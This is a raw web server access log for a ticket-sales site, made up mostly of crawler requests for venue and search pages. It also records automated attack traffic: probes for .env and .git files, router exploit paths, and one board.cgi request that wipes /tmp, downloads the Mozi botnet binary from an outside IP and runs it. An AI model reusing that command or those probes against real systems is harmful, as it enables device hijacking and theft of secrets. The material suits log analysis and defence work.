4.151.226.80 - - [18/Feb/2025:00:00:49 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
92.255.57.58 - - [18/Feb/2025:00:10:49 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 -
70.39.75.132 - - [18/Feb/2025:00:17:58 +0100] "GET /ticket2/opencms/ab2g HTTP/1.1" 404 -
70.39.75.132 - - [18/Feb/2025:00:17:59 +0100] "GET /ticket2/opencms/ab2h HTTP/1.1" 404 -
70.39.75.132 - - [18/Feb/2025:00:17:59 +0100] "GET /ticket2/opencms/alive.php HTTP/1.1" 404 -
70.39.75.132 - - [18/Feb/2025:00:18:04 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
70.39.75.132 - - [18/Feb/2025:00:18:05 +0100] "GET /ticket2/opencms/t4 HTTP/1.1" 404 -
70.39.75.132 - - [18/Feb/2025:00:18:06 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
70.39.75.132 - - [18/Feb/2025:00:18:07 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
70.39.75.132 - - [18/Feb/2025:00:18:07 +0100] "GET /ticket2/opencms/teorema505?t=1 HTTP/1.1" 404 -
193.68.89.51 - - [18/Feb/2025:00:21:01 +0100] "GET / HTTP/1.1" 404 -
141.255.166.90 - - [18/Feb/2025:00:34:45 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
185.242.226.109 - - [18/Feb/2025:00:36:40 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [18/Feb/2025:00:36:41 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.68.89.10 - - [18/Feb/2025:00:45:48 +0100] "GET / HTTP/1.1" 404 -
52.167.144.204 - - [18/Feb/2025:00:49:39 +0100] "GET /ticket2/opencms/sv/buy/?comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=06324577-7173-BAB0-146D-E644C912F7C1 HTTP/1.1" 200 75247
46.19.143.10 - - [18/Feb/2025:01:08:22 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 -
196.251.72.73 - - [18/Feb/2025:01:09:14 +0100] "GET /ticket2/opencms/.git/index HTTP/1.1" 404 -
64.62.156.28 - - [01/Jan/1970:00:59:59 +0100] "-" 400 -
45.249.245.160 - - [18/Feb/2025:01:38:16 +0100] "GET /ticket2/opencms/ HTTP/1.1" 500 -
196.251.72.73 - - [18/Feb/2025:01:51:16 +0100] "GET /ticket2/opencms/_profiler/phpinfo HTTP/1.1" 404 -
193.68.89.51 - - [18/Feb/2025:02:07:42 +0100] "GET / HTTP/1.1" 404 -
193.68.89.10 - - [18/Feb/2025:02:20:53 +0100] "GET / HTTP/1.1" 404 -
209.38.243.164 - - [18/Feb/2025:02:42:20 +0100] "GET / HTTP/1.1" 404 -
209.38.243.164 - - [18/Feb/2025:02:42:20 +0100] "GET /download/powershell/ HTTP/1.1" 404 -
209.38.243.164 - - [18/Feb/2025:02:42:20 +0100] "GET /get.php HTTP/1.1" 404 -
185.242.226.109 - - [18/Feb/2025:02:42:26 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
185.242.226.109 - - [18/Feb/2025:02:42:26 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
185.242.226.109 - - [18/Feb/2025:02:42:26 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
109.205.213.198 - - [18/Feb/2025:02:47:06 +0100] "GET / HTTP/1.1" 404 -
193.68.89.51 - - [18/Feb/2025:02:49:52 +0100] "GET / HTTP/1.1" 404 -
24.144.91.132 - - [18/Feb/2025:03:03:32 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
114.119.150.86 - - [18/Feb/2025:03:13:38 +0100] "GET /ticket2/opencms/en/venue/?venueid=F3A5C9EC-4CEF-B563-FECD-1A9EEC18334F HTTP/1.1" 200 63631
193.68.89.51 - - [18/Feb/2025:03:30:24 +0100] "GET / HTTP/1.1" 404 -
196.251.117.173 - - [18/Feb/2025:03:44:13 +0100] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 -
202.66.165.224 - - [18/Feb/2025:03:55:24 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 -
193.68.89.10 - - [18/Feb/2025:04:03:42 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:04:20:36 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
45.144.212.139 - - [18/Feb/2025:04:20:46 +0100] "GET /ticket2/opencms/.git/refs/heads/ HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:04:21:30 +0100] "GET /ticket2/opencms/sv/ HTTP/1.1" 200 68095
66.249.66.160 - - [18/Feb/2025:04:25:36 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=barcelona&submit= HTTP/1.1" 200 84990
66.249.66.160 - - [18/Feb/2025:04:27:17 +0100] "GET /ticket2/opencms/en/venue/ HTTP/1.1" 200 332826
170.64.149.22 - - [18/Feb/2025:04:28:16 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:04:28:30 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=tottenham&submit= HTTP/1.1" 200 86415
66.249.66.161 - - [18/Feb/2025:04:29:34 +0100] "GET /ticket2/opencms/en/affiliateprogram.html HTTP/1.1" 200 63934
66.249.66.161 - - [18/Feb/2025:04:30:26 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=liverpool&submit= HTTP/1.1" 200 85794
193.68.89.51 - - [18/Feb/2025:04:30:29 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:04:44:42 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=chelsea&submit= HTTP/1.1" 200 87360
66.249.66.160 - - [18/Feb/2025:04:47:07 +0100] "GET /ticket2/opencms/sv/affiliateprogram.html HTTP/1.1" 200 65553
66.249.66.160 - - [18/Feb/2025:04:47:07 +0100] "GET /ticket2/opencms/sv/buy/ HTTP/1.1" 200 65243
66.249.66.160 - - [18/Feb/2025:04:47:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=93055F81-99D6-0EE6-3CC8-FB4301992434 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:04:50:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=A3B02FE6-E314-D205-EF34-B3751539C7A7 HTTP/1.1" 200 93013
196.251.69.18 - - [18/Feb/2025:04:50:33 +0100] "GET /ticket2/opencms/.env HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:04:51:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=7EB583F0-D67D-8877-88CD-3F7B9DDEB361 HTTP/1.1" 200 93672
66.249.66.162 - - [18/Feb/2025:04:53:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=FEF54986-84B0-FEDA-0583-5080DFD917BA HTTP/1.1" 200 93013
92.255.57.86 - - [18/Feb/2025:04:54:31 +0100] "GET /ticket2/opencms/remote/login HTTP/1.1" 404 -
92.255.57.86 - - [18/Feb/2025:04:54:31 +0100] "GET /ticket2/opencms/login HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:04:59:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=BFE57D5D-96E9-5760-3742-A1CEB6924397 HTTP/1.1" 200 93013
78.108.177.50 - - [18/Feb/2025:05:01:13 +0100] "GET / HTTP/1.0" 404 -
66.249.66.161 - - [18/Feb/2025:05:01:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=C8ABE51D-DDC3-D19F-A0F7-AA8797A5EB51 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:05:02:27 +0100] "GET /ticket2/opencms/en/venue/?countryid=7EE0FE36-9C17-F539-5F8E-1F2CFF8A0D7B HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:02:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=AD4C6C1F-4EA2-1827-F34A-F0A47DB58003 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:03:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=B05AF8CC-D1BF-73AB-E946-B6702610D2C6 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:03:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=62204D9B-992F-EFF6-482A-943BBD9879C3 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:03:47 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEA98181-AF32-4AD7-7F85-B2BF5D143D52 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:08:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=E83385F7-FB78-F065-4683-FDC212CE9BC4 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:08:17 +0100] "GET /ticket2/opencms/en/venue/?countryid=3E153AD4-B966-FBA9-55D2-B5BF8B4DBAEE HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:09:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=ACAFFD14-DCE8-EFC6-6ECA-AF006BA900C4 HTTP/1.1" 200 93013
13.58.145.0 - - [18/Feb/2025:05:11:09 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
13.58.145.0 - - [18/Feb/2025:05:11:10 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.160 - - [18/Feb/2025:05:15:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=E5A463DD-D0D6-2F66-230F-35633A8D9ED0 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:16:22 +0100] "GET /ticket2/opencms/en/venue/?countryid=A41A8692-50A8-E04F-AB0B-A9766CB2286D HTTP/1.1" 200 93013
193.68.89.51 - - [18/Feb/2025:05:19:59 +0100] "GET / HTTP/1.1" 404 -
102.212.40.121 - - [18/Feb/2025:05:20:38 +0100] "GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.21.160.103:38580/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron HTTP/1.0" 404 -
66.249.66.161 - - [18/Feb/2025:05:21:48 +0100] "GET /ticket2/opencms/en/venue/?countryid=2E49BBE4-C681-08D6-D216-0893A1269431 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:22:26 +0100] "GET /ticket2/opencms/en/venue/?countryid=65CBF22C-E953-E822-8DA0-6226C52D7D6A HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:22:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=298905FA-E037-07AD-4909-74C6371F3F35 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:23:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=DB82417F-35E8-BF3C-287A-21ECAFBB9DD1 HTTP/1.1" 200 93013
43.130.15.147 - - [18/Feb/2025:05:24:21 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
43.130.15.147 - - [18/Feb/2025:05:24:23 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.162 - - [18/Feb/2025:05:27:10 +0100] "GET /ticket2/opencms/en/venue/?countryid=2EB4A8F2-7936-B060-2C7F-BD402D9491FB HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:05:36:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=F889867A-CECB-DD27-726E-95554BB6B831 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:39:39 +0100] "GET /ticket2/opencms/en/venue/?countryid=59446ECA-F11A-1164-7278-5F00083EF337 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:41:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=C20C79E6-EE6B-26D5-6506-E0F6BF6B710A HTTP/1.1" 200 94418
170.64.149.22 - - [18/Feb/2025:05:41:56 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:05:43:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=3255DA3D-476B-211A-8F09-81C55CABEF03 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:43:19 +0100] "GET /ticket2/opencms/en/venue/?countryid=C7880A4A-050D-8AB8-4FEC-8062D983D070 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:48:49 +0100] "GET /ticket2/opencms/en/venue/?countryid=EF3F1C0A-ABF4-7226-18E0-4339A3934525 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:52:08 +0100] "GET /ticket2/opencms/en/venue/?countryid=FA6155EB-FA45-A94F-2ADE-86C62589DA1C HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:05:52:21 +0100] "GET /ticket2/opencms/en/venue/?countryid=ABC76395-F87D-C1C2-D371-A569066C3F43 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:05:52:42 +0100] "GET /ticket2/opencms/en/venue/?countryid=4EEBA21C-1425-8784-6DA1-449CA0D3E5D8 HTTP/1.1" 200 93013
193.68.89.10 - - [18/Feb/2025:05:53:59 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:05:54:36 +0100] "GET /ticket2/opencms/en/sell/ HTTP/1.1" 302 -
66.249.66.162 - - [18/Feb/2025:05:54:38 +0100] "GET /ticket2/opencms/en/login/?url=/en/sell/ HTTP/1.1" 200 65723
66.249.66.162 - - [18/Feb/2025:06:01:35 +0100] "GET /ticket2/opencms/en/search.html?searchQuery=psg&submit=/ HTTP/1.1" 200 84362
66.249.66.162 - - [18/Feb/2025:06:08:18 +0100] "GET /ticket2/opencms/en/ask-form.html HTTP/1.1" 200 3146
66.249.66.162 - - [18/Feb/2025:06:08:44 +0100] "GET /ticket2/opencms/en/venue/?venueid=4281EF24-819D-10DB-AFDA-8A385BCC22F4 HTTP/1.1" 200 63639
66.249.66.162 - - [18/Feb/2025:06:09:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=18267CD0-0660-EC77-6783-F80F8F5E2113 HTTP/1.1" 200 63634
66.249.66.161 - - [18/Feb/2025:06:09:48 +0100] "GET /ticket2/opencms/en/venue/?venueid=279B18FD-4210-8852-93EB-A84B5C61044A HTTP/1.1" 200 63636
66.249.66.160 - - [18/Feb/2025:06:10:08 +0100] "GET /ticket2/opencms/en/venue/?venueid=7DFFA88D-A72E-EF83-E1F4-D4C0A7C75BDB HTTP/1.1" 200 63627
66.249.66.160 - - [18/Feb/2025:06:11:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=5FD2FED0-DB89-FAFA-1927-AF1A95DA13A5 HTTP/1.1" 200 63615
193.68.89.51 - - [18/Feb/2025:06:13:58 +0100] "GET / HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:06:27:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=2A1F7458-E62C-56A4-0001-4FFC2E2DB7CB HTTP/1.1" 200 63598
66.249.66.160 - - [18/Feb/2025:06:27:22 +0100] "GET /ticket2/opencms/en/venue/?venueid=80282372-5C99-DBF4-F014-FB112931F6DA HTTP/1.1" 200 63627
66.249.66.162 - - [18/Feb/2025:06:28:47 +0100] "GET /ticket2/opencms/en/venue/?venueid=B6945CB2-E0A0-4A08-48BD-0C2A2E2927C8 HTTP/1.1" 200 63582
44.220.188.160 - - [18/Feb/2025:06:43:44 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
44.220.188.160 - - [18/Feb/2025:06:43:45 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
193.23.3.37 - - [18/Feb/2025:06:46:06 +0100] "GET /ticket2/opencms/.git/config HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:06:46:31 +0100] "GET /ticket2/opencms/en/venue/?venueid=3C42100B-58B0-2CFB-51D8-262D48BD2A0E HTTP/1.1" 200 63612
167.94.145.100 - - [18/Feb/2025:06:50:22 +0100] "GET / HTTP/1.1" 404 -
167.94.145.100 - - [18/Feb/2025:06:50:32 +0100] "GET / HTTP/1.1" 404 -
167.94.145.100 - - [18/Feb/2025:06:50:32 +0100] "PRI * HTTP/2.0" 505 -
66.249.66.162 - - [18/Feb/2025:06:51:40 +0100] "GET /ticket2/opencms/en/venue/?venueid=9105DCA9-DA89-4D98-8EC3-D0773C34A12F HTTP/1.1" 200 63615
66.249.66.160 - - [18/Feb/2025:06:52:26 +0100] "GET /ticket2/opencms/en/venue/?venueid=16E0C8F7-C946-BD85-3408-7035EE064BCF HTTP/1.1" 200 63695
66.249.66.161 - - [18/Feb/2025:06:52:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=DA22C9F4-20C4-6978-CFDD-A1728A4A23BC HTTP/1.1" 200 63734
66.249.66.162 - - [18/Feb/2025:06:56:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=7BE96A80-409A-37FB-9444-3580682D6340 HTTP/1.1" 200 63610
66.249.66.161 - - [18/Feb/2025:07:01:49 +0100] "GET /ticket2/opencms/en/venue/?countryid=65FCED9C-5C2E-43C2-63C9-AA64AA056E6E HTTP/1.1" 200 93013
114.119.143.233 - - [18/Feb/2025:07:03:53 +0100] "GET /ticket2/opencms/en/sport/football-tickets/premier_league/tottenham/ HTTP/1.1" 200 64498
193.68.89.51 - - [18/Feb/2025:07:10:27 +0100] "GET / HTTP/1.1" 404 -
152.67.47.240 - - [18/Feb/2025:07:21:40 +0100] "???6C?h ?*Z?????6#??'Al????????? ???`?dF+????^?????????*?'?n??+?/?,?0????? ??" 400 -
66.249.66.160 - - [18/Feb/2025:07:31:48 +0100] "GET /ticket2/opencms/en/venue/?venueid=5E4247B1-038D-69C7-681E-59A3027FAB84 HTTP/1.1" 200 63651
193.68.89.10 - - [18/Feb/2025:07:32:03 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:07:33:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=43225DE7-2183-4D01-76EB-8CE89B54C5DC HTTP/1.1" 200 63589
51.15.21.147 - - [18/Feb/2025:07:35:06 +0100] "GET / HTTP/1.1" 404 -
66.249.66.162 - - [18/Feb/2025:07:38:27 +0100] "GET /ticket2/opencms/en/venue/?venueid=ECA1E61D-2477-4810-8BC2-649930C9F0AE HTTP/1.1" 200 63643
184.105.247.194 - - [18/Feb/2025:07:50:06 +0100] "GET /ticket2/opencms/ HTTP/1.1" 302 -
114.119.143.233 - - [18/Feb/2025:07:51:26 +0100] "GET /ticket2/opencms/en/ HTTP/1.1" 200 66763
66.249.66.160 - - [18/Feb/2025:07:51:31 +0100] "GET /ticket2/opencms/en/venue/?venueid=BCA44AE3-0AA2-97FD-825B-60825F01067E HTTP/1.1" 200 63669
66.249.66.160 - - [18/Feb/2025:07:51:39 +0100] "GET /ticket2/opencms/en/venue/?venueid=37C435E9-F183-6029-6984-FE323816144B HTTP/1.1" 200 63603
66.249.66.161 - - [18/Feb/2025:07:52:45 +0100] "GET /ticket2/opencms/en/venue/?venueid=3B0B3F5D-FFA8-DF13-4D74-A2C019267C7D HTTP/1.1" 200 63646
114.119.150.86 - - [18/Feb/2025:07:52:53 +0100] "GET /ticket2/opencms/en/buy/?page=10&eventid=684F42AD-E69E-B0FB-F34B-E9B5D5266D07 HTTP/1.1" 200 64971
193.68.89.51 - - [18/Feb/2025:07:54:06 +0100] "GET / HTTP/1.1" 404 -
184.105.247.194 - - [18/Feb/2025:07:57:18 +0100] "GET /ticket2/opencms/favicon.ico HTTP/1.1" 200 1406
66.249.66.160 - - [18/Feb/2025:07:58:26 +0100] "GET /ticket2/opencms/en/venue/?venueid=4BC8A4F7-B275-C48F-5201-9432C06891B2 HTTP/1.1" 200 63645
66.249.66.160 - - [18/Feb/2025:07:58:48 +0100] "GET /ticket2/opencms/en/venue/?venueid=2ABA9B42-A594-1503-6871-6005D5872901 HTTP/1.1" 200 63636
114.119.143.233 - - [18/Feb/2025:07:59:47 +0100] "GET /ticket2/opencms/en/buy/?comcatid=66708183-7480-3365-06BF-DBF60280AB45&catid=05A94519-01D1-C86F-9031-84936B0B9DAE HTTP/1.1" 200 65980
66.249.66.161 - - [18/Feb/2025:08:00:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=043FFF0B-AAEC-B60F-6995-11630828794B HTTP/1.1" 200 63610
66.249.66.161 - - [18/Feb/2025:08:01:36 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=810BB404-4103-77F2-A6C2-12D5E6C338E2&catid=95AE85B5-8979-BB11-643C-430ACC6D50F9 HTTP/1.1" 200 66456
66.249.66.160 - - [18/Feb/2025:08:02:08 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=C0DF818C-DB21-6E2E-4056-DB751FFE0C41 HTTP/1.1" 200 75646
184.105.247.194 - - [18/Feb/2025:08:02:45 +0100] "GET /ticket2/opencms/geoserver/web/ HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:08:03:32 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=573B7747-EE85-D769-C87D-F3F61FB64AA5 HTTP/1.1" 200 75656
66.249.66.161 - - [18/Feb/2025:08:03:38 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=6BD6E0B0-84AF-3A0D-3851-C1357CE9B771 HTTP/1.1" 200 75655
66.249.66.160 - - [18/Feb/2025:08:04:36 +0100] "GET /ticket2/opencms/en/venue/?venueid=627689FB-7CBA-64B6-7657-6F6CD9393A37 HTTP/1.1" 200 63619
66.249.66.162 - - [18/Feb/2025:08:11:39 +0100] "GET /ticket2/opencms/en/sport/football-tickets/ HTTP/1.1" 200 65660
66.249.66.162 - - [18/Feb/2025:08:12:22 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=3A7AEA37-903D-9533-4B33-21B0001FF1D1 HTTP/1.1" 200 75654
66.249.66.160 - - [18/Feb/2025:08:12:32 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=FF8D7FE7-4B09-7305-01C7-2D47F7913EB8 HTTP/1.1" 200 75650
114.119.158.251 - - [18/Feb/2025:08:12:48 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
114.119.130.116 - - [18/Feb/2025:08:13:59 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 200 773
66.249.66.160 - - [18/Feb/2025:08:17:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=0F4E0BCC-3EEC-C6F5-61BA-D1A20321E8C9 HTTP/1.1" 200 63630
66.249.66.162 - - [18/Feb/2025:08:21:08 +0100] "GET /ticket2/opencms/en/venue/?venueid=00752A38-52C0-4B10-A6B8-353C80635A91 HTTP/1.1" 200 63604
66.249.66.162 - - [18/Feb/2025:08:21:47 +0100] "GET /ticket2/opencms/en/venue/?venueid=83B8B6B9-A2B4-D4CB-2D8F-CE8D0CB4BEF2 HTTP/1.1" 200 63610
66.249.66.161 - - [18/Feb/2025:08:30:43 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=E92E6B1B-7CD1-74B1-312C-265A7D8125D0 HTTP/1.1" 200 75651
66.249.66.160 - - [18/Feb/2025:08:31:18 +0100] "GET /ticket2/opencms/sv/konsertbiljetter/coldplay/ HTTP/1.1" 200 69513
66.249.66.161 - - [18/Feb/2025:08:31:27 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=4B941E1B-E4E2-C53E-C693-9FA91BBA9AD5 HTTP/1.1" 200 75657
66.249.66.161 - - [18/Feb/2025:08:32:32 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=21C3854B-901E-11F9-7B7D-6838CC6AFAA4 HTTP/1.1" 200 75645
10.10.10.23 - - [18/Feb/2025:08:33:48 +0100] "GET / HTTP/1.1" 404 -
66.249.66.161 - - [18/Feb/2025:08:37:23 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=36394212-F82E-F845-399B-42BED55969CC HTTP/1.1" 200 75648
66.249.66.162 - - [18/Feb/2025:08:38:37 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=7CF2D645-F785-0CBB-1B7C-C4711617EAAD HTTP/1.1" 200 75664
51.8.102.224 - - [18/Feb/2025:08:39:24 +0100] "GET /ticket2/opencms/robots.txt HTTP/1.1" 304 -
66.249.66.162 - - [18/Feb/2025:08:41:19 +0100] "GET /ticket2/opencms/en/venue/?venueid=FACE899F-59EF-482C-BA13-20EDA4B8894D HTTP/1.1" 200 63628
66.249.66.160 - - [18/Feb/2025:08:41:38 +0100] "GET /ticket2/opencms/en/venue/?venueid=458A6284-D8D4-7921-D2F2-F8FD9B51F9EB HTTP/1.1" 200 63658
193.68.89.51 - - [18/Feb/2025:08:47:36 +0100] "GET / HTTP/1.1" 404 -
66.249.66.160 - - [18/Feb/2025:08:51:09 +0100] "GET /ticket2/opencms/sv/faq/ HTTP/1.1" 200 69071
66.249.66.161 - - [18/Feb/2025:08:51:18 +0100] "GET /ticket2/opencms/sv/buy/?page=6&comcatid=A17713B6-D984-201A-4143-ED4DB5ED5C2E&catid=739BFC5D-78FA-6834-D764-6CE64CA5F9EC HTTP/1.1" 200 75654
66.249.66.161 - - [18/Feb/2025:08:52:31 +0100] "GET /ticket2/opencms/en/venue/?countryid=469E8114-EEB1-DED6-F49A-3A2498C21B30 HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:08:52:32 +0100] "GET /ticket2/opencms/en/venue/?countryid=FE820485-92B2-CBF2-B829-80FB72DDC46F HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:08:53:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=DBF1B903-D9ED-502A-C58E-CF837DE83CCB HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:08:55:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=E51F1885-F514-FB3D-D1AC-60D5859EEBD8 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:08:58:09 +0100] "GET /ticket2/opencms/en/venue/?countryid=577F4BE1-D660-BA06-FD83-D505059D70AB HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:00:37 +0100] "GET /ticket2/opencms/en/login/ HTTP/1.1" 200 65723
66.249.66.161 - - [18/Feb/2025:09:01:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=869CA27A-97A1-03D4-5D03-7E27F7DE8DED HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:01:42 +0100] "GET /ticket2/opencms/en/venue/?venueid=EFA6E1D1-4242-14C9-92E7-0490DFFC81B7 HTTP/1.1" 200 63603
66.249.66.162 - - [18/Feb/2025:09:02:30 +0100] "GET /ticket2/opencms/en/venue/?venueid=8D532909-C41C-2A7C-5336-DE83887C261B HTTP/1.1" 200 63712
66.249.66.161 - - [18/Feb/2025:09:03:37 +0100] "GET /ticket2/opencms/en/venue/?countryid=219973C9-2DDA-2E70-1B9F-7B4A1AF9BB6C HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:09:05:39 +0100] "GET /ticket2/opencms/en/venue/?venueid=A8BF1563-78B5-8141-7CD3-5CAAEC11326C HTTP/1.1" 200 63652
66.249.66.161 - - [18/Feb/2025:09:06:45 +0100] "GET /ticket2/opencms/en/venue/?countryid=C3419397-8D1B-9427-953E-96370A3C8B07 HTTP/1.1" 200 93013
66.249.66.161 - - [18/Feb/2025:09:11:20 +0100] "GET /ticket2/opencms/en/venue/?countryid=CEE00D6A-FB56-5500-E375-BA915009094D HTTP/1.1" 200 93013
66.249.66.162 - - [18/Feb/2025:09:13:22 +0100] "GET /ticket2/opencms/en/venue/?venueid=A18E6B9F-ABE7-577B-3CDD-CFF0ABF1460E HTTP/1.1" 200 63621
66.249.66.161 - - [18/Feb/2025:09:13:36 +0100] "GET /ticket2/opencms/en/venue/?countryid=12E3BEDF-CE35-CC7F-2705-A98A37B9636B HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:15:07 +0100] "GET /ticket2/opencms/en/venue/?countryid=C390DA46-FDFE-72E8-463E-D2A88C688BC4 HTTP/1.1" 200 93013
66.249.66.160 - - [18/Feb/2025:09:18:21 +0100] "GET /ticket2/opencms/en/venue/?venueid=2F6DFDC1-F019-8112-F2A0-0983384F59FC HTTP/1.1" 200 63628
66.249.66.161 - - [18/Feb/2025:09:18:34 +0100] "GET /ticket2/opencms/en/venue/?countryid=86F93FF6-B3C2-4693-7679-0BD214A3D804 HTTP/1.1" 200 93013
64.62.197.216 - - [18/Feb/2025:09:22:03 +0100] "GET / HTTP/1.1" 404 -
64.62.197.226 - - [18/Feb/2025:09:22:40 +0100] "GET /favicon.ico HTTP/1.1" 404 -
64.62.197.213 - - [18/Feb/2025:09:22:49 +0100] "GET /?format=json HTTP/1.1" 404 -
64.62.197.214 - - [18/Feb/2025:09:23:02 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 -
